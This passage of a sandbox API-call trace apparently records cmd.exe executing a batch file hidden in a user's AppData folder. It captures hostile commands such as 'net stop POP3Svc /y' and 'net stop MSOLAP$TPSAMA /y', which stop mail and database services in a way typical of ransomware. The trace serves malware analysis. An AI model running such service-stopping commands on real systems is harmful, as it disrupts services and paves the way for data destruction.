dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.730] GetEnvironmentStringsW () returned 0x3f8408* [0199.730] GetProcessHeap () returned 0x3e0000 [0199.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.730] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.730] GetProcessHeap () returned 0x3e0000 [0199.730] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0199.730] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0199.730] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.730] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0199.730] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.730] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0199.730] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.730] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0199.731] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.731] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0199.731] SetConsoleInputExeNameW () returned 0x1 [0199.731] GetConsoleOutputCP () returned 0x1b5 [0199.731] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0199.731] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0199.731] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0199.731] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.731] SetFilePointer (in: hFile=0x74, lDistanceToMove=2931, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb73 [0199.731] GetProcessHeap () returned 0x3e0000 [0199.731] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0199.731] GetProcessHeap () returned 0x3e0000 [0199.731] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0199.732] GetProcessHeap () returned 0x3e0000 [0199.732] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0199.732] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.732] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb73 [0199.732] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xd4e, lpOverlapped=0x0) returned 1 [0199.732] SetFilePointer (in: hFile=0x74, lDistanceToMove=2952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb88 [0199.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop POP3Svc /y\r\n\n Control ServiceΓÇ¥ /y\r\n¥ /y\r\nlures\r\nnded\r\n") returned 21 [0199.733] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.733] GetFileType (hFile=0x74) returned 0x1 [0199.733] _get_osfhandle (_FileHandle=3) returned 0x74 [0199.733] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb88 [0199.733] GetProcessHeap () returned 0x3e0000 [0199.733] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0199.733] GetProcessHeap () returned 0x3e0000 [0199.733] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0199.736] _tell (_FileHandle=3) returned 2952 [0199.736] _close (_FileHandle=3) returned 0 [0199.736] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0199.736] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0199.736] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0199.736] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0199.736] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0199.736] _wcsicmp (_String1="net", _String2="CD") returned 11 [0199.736] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0199.736] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0199.736] _wcsicmp (_String1="net", _String2="REN") returned -4 [0199.736] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0199.737] _wcsicmp (_String1="net", _String2="SET") returned -5 [0199.737] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0199.737] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0199.737] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0199.737] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0199.737] _wcsicmp (_String1="net", _String2="MD") returned 1 [0199.737] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0199.737] _wcsicmp (_String1="net", _String2="RD") returned -4 [0199.737] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0199.737] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0199.737] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0199.737] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0199.737] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0199.737] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0199.737] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0199.737] _wcsicmp (_String1="net", _String2="VER") returned -8 [0199.737] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0199.737] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0199.737] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0199.737] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0199.737] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0199.737] _wcsicmp (_String1="net", _String2="START") returned -5 [0199.737] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0199.737] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0199.737] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0199.737] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0199.737] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0199.737] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0199.737] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0199.737] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0199.737] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0199.737] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0199.738] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0199.738] SetErrorMode (uMode=0x0) returned 0x1 [0199.738] GetProcessHeap () returned 0x3e0000 [0199.738] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0199.738] GetProcessHeap () returned 0x3e0000 [0199.738] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0199.738] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.738] GetProcessHeap () returned 0x3e0000 [0199.738] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0199.738] GetProcessHeap () returned 0x3e0000 [0199.738] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0199.739] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.739] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.739] GetLastError () returned 0x2 [0199.740] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.740] GetLastError () returned 0x2 [0199.740] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.740] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.740] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.741] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.741] GetLastError () returned 0x2 [0199.741] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.741] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.742] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.742] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0199.742] SetErrorMode (uMode=0x0) returned 0x1 [0199.742] GetProcessHeap () returned 0x3e0000 [0199.742] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0199.742] GetProcessHeap () returned 0x3e0000 [0199.742] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0199.743] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.743] GetProcessHeap () returned 0x3e0000 [0199.743] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.743] GetProcessHeap () returned 0x3e0000 [0199.743] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.743] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.744] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.744] GetLastError () returned 0x2 [0199.744] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.744] GetLastError () returned 0x2 [0199.745] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.745] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0199.745] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0199.745] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.745] GetLastError () returned 0x2 [0199.746] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0199.746] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0199.746] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.746] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.746] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.747] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.747] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.747] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop POP3Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop POP3Svc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop POP3Svc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x4fc, dwThreadId=0x444)) returned 1 [0199.751] CloseHandle (hObject=0x74) returned 1 [0199.751] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.751] GetProcessHeap () returned 0x3e0000 [0199.751] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.751] GetEnvironmentStringsW () returned 0x3f8408* [0199.751] GetProcessHeap () returned 0x3e0000 [0199.751] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.752] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.752] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0199.875] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0199.875] CloseHandle (hObject=0x78) returned 1 [0199.875] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0199.875] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0199.875] GetProcessHeap () returned 0x3e0000 [0199.875] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.875] GetEnvironmentStringsW () returned 0x3f8408* [0199.875] GetProcessHeap () returned 0x3e0000 [0199.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.876] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.876] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.876] GetProcessHeap () returned 0x3e0000 [0199.876] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.876] GetEnvironmentStringsW () returned 0x3f8408* [0199.876] GetProcessHeap () returned 0x3e0000 [0199.876] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.876] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.876] GetProcessHeap () returned 0x3e0000 [0199.876] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0199.876] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0199.876] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.876] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0199.876] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.876] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0199.876] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.876] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0199.877] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.877] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0199.877] SetConsoleInputExeNameW () returned 0x1 [0199.877] GetConsoleOutputCP () returned 0x1b5 [0199.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0199.877] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.878] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.878] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.878] SetFilePointer (in: hFile=0x78, lDistanceToMove=2952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb88 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0199.878] GetProcessHeap () returned 0x3e0000 [0199.878] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0199.878] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.878] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb88 [0199.878] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xd39, lpOverlapped=0x0) returned 1 [0199.878] SetFilePointer (in: hFile=0x78, lDistanceToMove=2979, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba3 [0199.879] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSOLAP$TPSAMA /y\r\nrol ServiceΓÇ¥ /y\r\n¥ /y\r\nlures\r\nnded\r\n") returned 27 [0199.879] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.879] GetFileType (hFile=0x78) returned 0x1 [0199.879] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.879] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xba3 [0199.879] GetProcessHeap () returned 0x3e0000 [0199.879] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0199.879] GetProcessHeap () returned 0x3e0000 [0199.879] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0199.882] _tell (_FileHandle=3) returned 2979 [0199.882] _close (_FileHandle=3) returned 0 [0199.882] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0199.882] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0199.882] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0199.882] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0199.882] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0199.882] _wcsicmp (_String1="net", _String2="CD") returned 11 [0199.882] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0199.882] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0199.882] _wcsicmp (_String1="net", _String2="REN") returned -4 [0199.882] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0199.883] _wcsicmp (_String1="net", _String2="SET") returned -5 [0199.883] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0199.883] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0199.883] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0199.883] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0199.883] _wcsicmp (_String1="net", _String2="MD") returned 1 [0199.883] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0199.883] _wcsicmp (_String1="net", _String2="RD") returned -4 [0199.883] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0199.883] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0199.883] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0199.883] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0199.883] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0199.883] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0199.883] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0199.883] _wcsicmp (_String1="net", _String2="VER") returned -8 [0199.883] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0199.883] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0199.883] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0199.883] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0199.883] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0199.883] _wcsicmp (_String1="net", _String2="START") returned -5 [0199.883] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0199.883] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0199.883] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0199.883] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0199.883] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0199.883] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0199.883] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0199.883] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0199.883] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0199.883] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0199.884] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: 